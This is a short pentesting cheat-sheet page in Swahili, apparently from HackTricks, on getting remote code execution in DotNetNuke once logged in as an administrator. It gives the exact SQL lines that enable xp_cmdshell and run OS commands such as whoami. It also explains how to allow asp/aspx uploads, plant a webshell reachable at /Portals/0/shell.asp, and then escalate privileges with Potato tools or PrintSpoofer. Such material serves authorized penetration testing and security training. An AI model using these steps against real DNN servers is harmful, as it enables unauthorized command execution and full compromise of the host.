1.2 KiB
DotNetNuke (DNN)
{{#include ../../banners/hacktricks-training.md}}
DotNetNuke (DNN)
Ikiwa unaingia kama meneja katika DNN ni rahisi kupata RCE.
RCE
Kupitia SQL
Konsoli ya SQL inapatikana chini ya ukurasa wa Settings ambapo unaweza kuwezesha xp_cmdshell na kufanya amri za mfumo wa uendeshaji.
Tumia mistari hii kuwezesha xp_cmdshell:
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
Na bonyeza "Run Script" ili kuendesha sentensi hizo za sQL.
Kisha, tumia kitu kama ifuatavyo kuendesha amri za OS:
xp_cmdshell 'whoami'
Via ASP webshell
Katika Settings -> Security -> More -> More Security Settings unaweza kuongeza nyongeza mpya zinazoruhusiwa chini ya Allowable File Extensions, na kisha kubonyeza kitufe cha Save.
Ongeza asp au aspx na kisha katika /admin/file-management pakia asp webshell inayoitwa shell.asp kwa mfano.
Kisha upate /Portals/0/shell.asp ili kufikia webshell yako.
Privilege Escalation
Unaweza kuinua mamlaka kwa kutumia Potatoes au PrintSpoofer kwa mfano.
{{#include ../../banners/hacktricks-training.md}}